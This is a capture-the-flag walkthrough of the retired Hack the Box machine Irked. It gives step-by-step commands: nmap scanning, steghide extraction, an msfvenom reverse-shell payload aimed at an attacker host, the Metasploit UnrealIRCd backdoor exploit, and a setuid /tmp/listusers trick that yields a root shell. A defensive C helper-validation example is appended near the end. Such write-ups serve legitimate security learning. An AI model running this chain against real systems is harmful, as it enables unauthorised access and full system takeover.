Capture the flag (CTF)

Hack the Box (HTB) machine walkthrough series — Irked

June 20, 2019 by Security Ninja

Today, we will be continuing with our exploration of Hack the Box (HTB) machines as seen in previous articles. This walkthrough is of an HTB machine named Irked.

HTB is an excellent platform that hosts machines belonging to multiple OSes. It also has some other challenges. Individuals have to solve a puzzle (simple enumeration plus pentest) in order to log into the platform and download the VPN pack to connect to the machines hosted on the HTB platform.

Note: Only write-ups of retired HTB machines are allowed. The machine in this article, named Irked, is retired.

The walkthrough

1. Download the VPN pack for the individual user and use the guidelines to log into the HTB VPN.

2. The Irked machine IP is 10.10.10.117.

3. We will adopt the same methodology of performing penetration testing. Let’s start with enumeration in order to learn as much information about the machine as possible.

4. As usual, let’s start with the Nmap scan to gather more information about the services running on this machine.
<<nmap -sC -sV -oA irked 10.10.10.117>>

5. As we can see, ports 22, 80 and 111 are discovered.

6. Let’s start the enumeration on port 80. Below is the landing page. One hint the page gives is that IRC is working on this box, but the initial Nmap scan does not reflect that. That indicates that we need to perform a full port scan as well.

7. Launching a full-blown scan on the box reveals the following IRC ports. It looks like the service UnrealIRCd is running on the box. The interesting part is that this same service is on three ports.

8. Back to enumeration of the image on port 80. Download the file and run steghide on it. It looks like there is embedded data in the image. I tried with a blank passphrase but could not extract the data, which means we need to find the key for it.
<<steghide info irked.jpg>>

9. As discovered above, we found UnrealIRCd, and it looks like there is an exploit for this. We’ll download and modify it to suit our needs.

10. We need to insert a Ruby reverse shell into it. Let’s generate one.
<<msfvenom -p cmd/unix/reverse_perl LHOST=<attacking machine ip> LPORT=1234 -f raw>>

11. Insert it into the payload1 variable and remove the other payload variables.

12. We set up a listener and execute the exploit on all three ports but could not get a reverse connection back.

13. There is a Metasploit exploit for this as well. Select the right exploit and set up options as below.

exploit=unreal_ircd_3281_backdoor

RHOST=10.10.10.117

RPORT=6667

14. As you can see, there was no session created.

15. We try the same but change the RPORT to 8067, as shown below.

16. In this case, we get a reverse shell back. Now we’re escaping the jail shell with a Python one-liner.
<<python -c 'import pty;pty.spawn("/bin/bash")'>>

17. We got a better shell now. Executing a command to list the contents:
<<ls -la>>

18. We got the directory for user “djmardov.” Under Documents, there is a user.txt, but it looks like permission is denied. Because we are currently under the ircd user, we need to escalate to djmardov.

19. There is a backup file as well. Let’s examine the contents of this file. Looks like a password, but where do we apply it? If you remember, we have a pending password for the initial image.

20. Applying the password to the image again results in successful extraction of a password.

<<steghide extract -sf irked.jpg>>

<<cat pass.txt>>

21. Let’s use this password for djmardov. We have an SSH port opened also.
<<ssh djmardov@10.10.10.117>>

22. And we are successful. Browsing to grab the user.txt file.

<<cd Documents>>

<<cat user.txt>>

23. Now let’s begin enumeration to escalate privileges as well.

24. As mentioned in previous articles, one of the ways to do this is to check for binaries with the SUID bit set. In this case, we have the binary “viewuser” in /usr/bin.
<<find / -perm -u=s -type f 2>/dev/null>>

25. Running this binary shows that it looks for a file called /tmp/listusers and executes it.

<<ls -l /usr/bin/viewuser>>

<</usr/bin/viewuser>>

26. We can create our own /tmp/listusers and add ‘/bin/sh’ to it.

<<echo '/bin/sh' > /tmp/listusers>>

<<chmod 777 /tmp/listusers>>

<<whoami>>

27. And we are at root. Grabbing the root.txt contents.

<<cd /root>>

<<cat root.txt>>

This was a machine based on enumeration. First, we needed to do a full port scan to uncover the hidden service and then exploit it. Privilege escalation to root was straightforward.
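
Steps 24 to 26 work because a setuid binary runs whatever sits at /tmp/listusers, a path any local user can create. As an added example (not code from this article or from viewuser, whose source the page does not show), here is the ownership and permission check a privileged program could apply before executing a helper; the names `helper_is_trusted`, `locked_down` and `demo` are hypothetical.

```c
/* Added example, not from the walkthrough: vet a helper before a privileged exec. */
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <libgen.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Owned by uid and not writable by group or others. */
static int locked_down(const struct stat *st, uid_t uid)
{
    return st->st_uid == uid && !(st->st_mode & (S_IWGRP | S_IWOTH));
}

/* 1 if path may be run on behalf of trusted_uid (0 in a setuid-root program):
 * an absolute path to a regular file, not a symlink, with both the file and
 * its parent directory locked down to trusted_uid. */
int helper_is_trusted(const char *path, uid_t trusted_uid)
{
    struct stat st;
    char copy[PATH_MAX];            /* dirname() may modify its argument */
    if (!path || path[0] != '/') return 0;
    if (snprintf(copy, sizeof copy, "%s", path) >= (int)sizeof copy) return 0;
    if (lstat(path, &st) != 0 || !S_ISREG(st.st_mode)) return 0;
    if (!locked_down(&st, trusted_uid)) return 0;
    if (stat(dirname(copy), &st) != 0 || !S_ISDIR(st.st_mode)) return 0;
    return locked_down(&st, trusted_uid);
}

/* Constructed demo: bit 0 = strict file, bit 1 = 0777 file, bit 2 = 0777 parent dir. */
int demo(void)
{
    char dir[] = "/tmp/helper_demo_XXXXXX", file[PATH_MAX];
    int fd, bits;
    if (!mkdtemp(dir)) return -1;
    snprintf(file, sizeof file, "%s/listusers", dir);
    if ((fd = open(file, O_CREAT | O_WRONLY, 0755)) < 0) return -1;
    close(fd);
    bits = helper_is_trusted(file, geteuid());
    chmod(file, 0777);
    bits |= helper_is_trusted(file, geteuid()) << 1;
    chmod(file, 0755); chmod(dir, 0777);
    bits |= helper_is_trusted(file, geteuid()) << 2;
    unlink(file); rmdir(dir);
    return bits;
}

int main(void) { printf("demo=%d\n", demo()); return 0; }
```

A check by path followed by an exec by path still leaves a race window, so a production version would open the file with `O_NOFOLLOW`, repeat the tests with `fstat` on the descriptor and run it with `fexecve`. Keeping helpers out of /tmp altogether is simpler still.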

We will continue this series with more such interesting HTB machines!